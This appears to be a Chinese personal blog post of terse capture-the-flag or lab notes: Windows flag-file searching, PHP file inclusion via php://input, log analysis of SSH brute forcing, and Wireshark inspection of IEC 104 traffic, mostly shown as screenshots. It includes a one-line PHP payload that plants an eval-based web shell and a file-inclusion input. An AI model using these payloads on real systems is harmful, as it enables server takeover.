banner
300
1 分钟

JNPX

2026年3月1日
无标签

靶机 192.168.111.117

处理windows 乱码问题

chcp 65001

type flag.txt

brew install vim --override-system-vi

# 在.目录及所有子目录中找出所有文件名中包含flag的文件

C:\Users\cashey\Desktop>for /r . %i in (*flag*) do @echo %i

http://127.0.0.1/cmd.php`?file=php://input`

[POST DATA]

也可以POST如下内容生成一句话: <?php fputs(fopen(“shell.php”,”w”),’<?php eval($_POST["cmd"];?>’);?>

?file=compress.zlib://./ev64.txt.zip.gif


Untitled.png
Untitled.png

Untitled 1.png
Untitled 1.png

日志分析

爆破ssh

20:48

ip17

历史

blog image
blog image

blog image
blog image

开启wireshark的TCP校验和功能,某某版默认被关闭了

Untitled 2.png
Untitled 2.png

分析》专家信息

Untitled 3.png
Untitled 3.png

Untitled 4.png
Untitled 4.png

Untitled 5.png
Untitled 5.png

blog image
blog image

blog image
blog image

过滤iec 104

追踪流

原始数据

Untitled 6.png
Untitled 6.png

找不合法的控制命令

Untitled 7.png
Untitled 7.png
END

相关文章

暂无相关文章

© 2026 一个普通的干饭人. All Rights Reserved. / RSS / Sitemap
Powered by Tanstack Start & Flare Stack Blog